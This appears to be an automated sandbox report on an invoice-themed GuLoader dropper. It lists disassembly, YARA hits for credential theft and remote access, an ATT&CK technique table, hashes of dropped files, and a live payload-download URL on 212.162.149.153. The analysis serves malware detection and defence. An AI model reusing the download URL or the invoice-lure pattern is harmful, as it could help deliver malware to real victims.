      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325116CF mov eax, dword ptr fs:[00000030h]3_2_325116CF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F6C7 mov eax, dword ptr fs:[00000030h]3_2_3259F6C7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259D6F0 mov eax, dword ptr fs:[00000030h]3_2_3259D6F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325136EF mov eax, dword ptr fs:[00000030h]3_2_325136EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B3749 mov eax, dword ptr fs:[00000030h]3_2_325B3749
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7703 mov eax, dword ptr fs:[00000030h]3_2_324E7703
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515734 mov eax, dword ptr fs:[00000030h]3_2_32515734
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3720 mov eax, dword ptr fs:[00000030h]3_2_324E3720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7

      Stealing of Sensitive Information

      Source: Yara match File source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Access Token Manipulation | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | 56% | Virustotal |
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | 42% | ReversingLabs | Win32.Trojan.Guloader

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | 0% | ReversingLabs |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bink | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin( | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin | 0% | Avira URL Cloud | safe
      http://nsis.sf.net/NSIS_Error... | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJ | 0% | Avira URL Cloud | safe
      No contacted domains info
      Name | Malicious | Antivirus Detection | Reputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin | false | Avira URL Cloud: safe | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bink | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmp | false | | high
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJ | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.ftp.ftp://ftp.gopher. | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmp | false | | high
      http://nsis.sf.net/NSIS_Error... | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | false | Avira URL Cloud: safe | unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp | false | | high
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin( | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            212.162.149.153 | unknown | Netherlands | | 64236 | UNREAL-SERVERSUS | false
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1587320
            Start date and time:2025-01-10 07:11:49 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
            Detection:MAL
            Classification:mal76.troj.evad.winEXE@3/6@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 88%
            • Number of executed functions: 47
            • Number of non-executed functions: 299
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.12.23.50
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            No simulations
            No context
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            UNREAL-SERVERSUS | rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
            UNREAL-SERVERSUS | rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
            UNREAL-SERVERSUS | RFQ NO 65-58003.exe | malicious | Remcos | 212.162.149.92
            UNREAL-SERVERSUS | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 162.251.122.87
            UNREAL-SERVERSUS | RFQ 008191.exe | malicious | Remcos, GuLoader | 212.162.149.89
            UNREAL-SERVERSUS | purchase.order.exe | malicious | FormBook, GuLoader | 212.162.149.66
            No context
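            Match | Associated Sample Name / URL | Detection | Threat Name
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | EL378_SPEC.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | EL378_SPEC.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | DHL_INVOICE.exe | malicious | GuLoader, Lokibot
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | DHL_#U53d1#U7968.exe | malicious | GuLoader, Lokibot
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | DHL_INVOICE.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | DHL_#U53d1#U7968.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | Ta62k9weDV.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | Ta62k9weDV.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll | HF-2209869481.exe | malicious | GuLoader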
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):298979
                              Entropy (8bit):7.586687461235365
                              Encrypted:false
                              SSDEEP:6144:b0AmmTjA0ppG2c3blFuFuxf0DaPN5ug3yzP:LmmTjxbG2CbHu/+V5v3y7
                              MD5:45893409E37B0F5E8F052154BF1662E9
                              SHA1:5CE2184F0675DD5FAE184B4E8F6264AD72ACDCF3
                              SHA-256:635325D683AF6AAAFB256FF4D53A121B6A3C1465B2BC19010D881700BFA7EA56
                              SHA-512:621D6910CE1B8D3740571D144E40B83DD523693513BB45F01E81BF72CED1165510440002189FD2084EECA9AA703B8D95BEC0BFFD62ABED4E33319FF7A0FF9F8D
                              Malicious:false
                              Reputation:low
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):225235
                              Entropy (8bit):1.2505494983045329
                              Encrypted:false
                              SSDEEP:768:/RwMidX4Q904QeKbFSmjFFrFbCgq4ONJx22YjLusudtedqLIkvO6KdE3r/s4qVZ0:8tsFB+d3KLd1JA37H
                              MD5:6883695B7EE87239D1031F25CB022A43
                              SHA1:4ECA46FA3848E24D7FDD7B79AED8742A58750497
                              SHA-256:8E6299FABA71898C9DB184D0B04DB12307531F61D8B40A12EA436E18F181AA43
                              SHA-512:E2894F566FE1A61DEAEBB081C9452B0E7BB72C7EF5A1E80E0D5C9F74175DB8FAFD461FD3B5B9083153EF5C0FA6D18F10112B03E3966722026C3A1BE5346965FA
                              Malicious:false
                              Reputation:low
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):103368
                              Entropy (8bit):2.6625379092327504
                              Encrypted:false
                              SSDEEP:1536:puAH3GNT2ANNoOWNDtT4UgygquQxv2F4MxDj17Ya/irUJuCvpw:pPkC
                              MD5:A0C3222C6706A6C067303C48A4D936E8
                              SHA1:C15C057DCC249E7C7568EDC30154E89AFB82333D
                              SHA-256:E3066014493AE763047168EBD753EF32C2C03F732FA3BEA8F5CEB2C53F196B0C
                              SHA-512:F02769D95CCC232AEF1A0656564FA6055F91FC2A0EED8F383B0E663B5507C7BF8D59B95FFDFA505BAE5945C7A2E8B3C5964ED3A167EA6E65EA80948CDAA57CD9
                              Malicious:false
                              Reputation:low
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):314272
                              Entropy (8bit):1.2593509662318005
                              Encrypted:false
                              SSDEEP:768:fBqB1CAi48on0XydRS4Jbu2SnQ0bR7NZWfw/EIn5D6POQLxALEmpembXYqSxVil5:Z0/0mnzQ3hWdXjGVJ+xajqazD
                              MD5:C7D83B1354B58B52F3EEEB0D54AE8051
                              SHA1:D58F01E64AC4AFE927668F75042DC99A01FC8B26
                              SHA-256:4DE62E400FD03ED1A45A9F90DF6B155F313BD15C2876B0B0AD64E7AA7BBBE12C
                              SHA-512:96801C502EA4E67DFC8380C789DA84307A261F4FBBD2D8ACCF56E95919B63CC7E89D00FADB32C7F95CD1CD75BDBCBC01FF0EC81214587E084726828C974511D7
                              Malicious:false
                              Reputation:low
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):5120
                              Entropy (8bit):4.289419438668023
                              Encrypted:false
                              SSDEEP:48:qbrtDVP10LgQL8QRU8IlmWm7WmnuWK8hSemoMqG5QEv8sF9U3ofMU:UVPFQIqlemWm7WmTaehG+EkR
                              MD5:E459F344B4A47AF2CF15D821F3946724
                              SHA1:5DF805FCF0A857B98CECCA139B2EA99979C8F01E
                              SHA-256:F4778B8ACA1EB5D93D267468589B4BF45B827A50300EB552D796E9DC22ADE419
                              SHA-512:5B8285A166404C73869D5AAA25C5AF3544AB4A2F012C5EA1E12B04A1D6FA3D32B4A6857E9FD29DD3C86DD5DC8111E3E86DE11BDB5496C1C527FF1BC91BD791BB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.974444797015433
                              Encrypted:false
                              SSDEEP:192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
                              MD5:637E1FA13012A78922B6E98EFC0B12E2
                              SHA1:8012D44E42CD6D813EA63D5CCBF190FE72E3C778
                              SHA-256:703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
                              SHA-512:932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                              • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                              • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                              • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                              • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                              • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                              • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                              • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                              • Filename: HF-2209869481.exe, Detection: malicious, Browse
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):7.6229397457593615
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File size:533'960 bytes
                              MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
                              SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
                              SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
                              SHA512:8eb1daf79455c75dba4521196c8ef468184f1a0d2c385bd424c4ce82174fe8c2970a47d72fc7d83c444629a236e373a70fb1d3cee236cfff246dba4b8ceb48c7
                              SSDEEP:12288:rRfrRAA+3hDCYCCslgEzlaGuZHStFIH/x5eWJe5:dfNAAmhBCCsRzeRCFoewe5
                              TLSH:6CB402259B4DCC12E4B514BCE732AACAF4FCBD53966A9613F3103E2B857CB819E0D151
                              Icon Hash:5b797d7d8d11592d
                              Entrypoint:0x4036d7
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x63132B84 [Sat Sep 3 10:25:08 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                              Signature Valid:false
                              Signature Issuer:CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                              Error Number:-2146762487
                              Not Before, Not After
                              • 23/03/2024 08:06:38 23/03/2025 08:06:38
                              Subject Chain
                              • CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                              Version:3
                              Thumbprint MD5:F258822B369D369853552E5A72A06C88
                              Thumbprint SHA-1:36E3DCA8400E4D266774CF32D7E5D6D9C2D2E757
                              Thumbprint SHA-256:CB63044CE9D8355C6518EC29E162D6431C74555D2F0496577D9F2F83BFC6150F
                              Serial:0FEFB9AC4FE7B58D3E3EC15139BA5132C65A25C4
                              Instruction
                              sub esp, 000003ECh
                              push ebx
                              push ebp
                              push esi
                              push edi
                              xor ebx, ebx
                              mov edi, 00408528h
                              push 00008001h
                              mov dword ptr [esp+14h], ebx
                              mov ebp, ebx
                              call dword ptr [00408170h]
                              mov esi, dword ptr [004080ACh]
                              lea eax, dword ptr [esp+2Ch]
                              xorps xmm0, xmm0
                              mov dword ptr [esp+40h], ebx
                              push eax
                              movlpd qword ptr [esp+00000144h], xmm0
                              mov dword ptr [esp+30h], 0000011Ch
                              call esi
                              test eax, eax
                              jne 00007FB460846849h
                              lea eax, dword ptr [esp+2Ch]
                              mov dword ptr [esp+2Ch], 00000114h
                              push eax
                              call esi
                              push 00000053h
                              pop eax
                              mov dl, 04h
                              mov byte ptr [esp+00000146h], dl
                              cmp word ptr [esp+40h], ax
                              jne 00007FB460846823h
                              mov eax, dword ptr [esp+5Ah]
                              add eax, FFFFFFD0h
                              mov word ptr [esp+00000140h], ax
                              jmp 00007FB46084681Dh
                              xor eax, eax
                              jmp 00007FB460846804h
                              mov dl, byte ptr [esp+00000146h]
                              cmp dword ptr [esp+30h], 0Ah
                              jnc 00007FB46084681Dh
                              movzx eax, word ptr [esp+38h]
                              mov dword ptr [esp+38h], eax
                              jmp 00007FB460846816h
                              mov eax, dword ptr [esp+38h]
                              mov dword ptr [00429DF8h], eax
                              movzx eax, byte ptr [esp+30h]
                              shl ax, 0008h
                              movzx ecx, ax
                              movzx eax, byte ptr [esp+34h]
                              or ecx, eax
                              movzx eax, byte ptr [esp+00000140h]
                              shl ax, 0008h
                              shl ecx, 10h
                              movzx eax, word ptr [eax]
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a00 | 0xa0 | .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x51000 | 0x1b7f0 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x817e0 | 0xde8 |
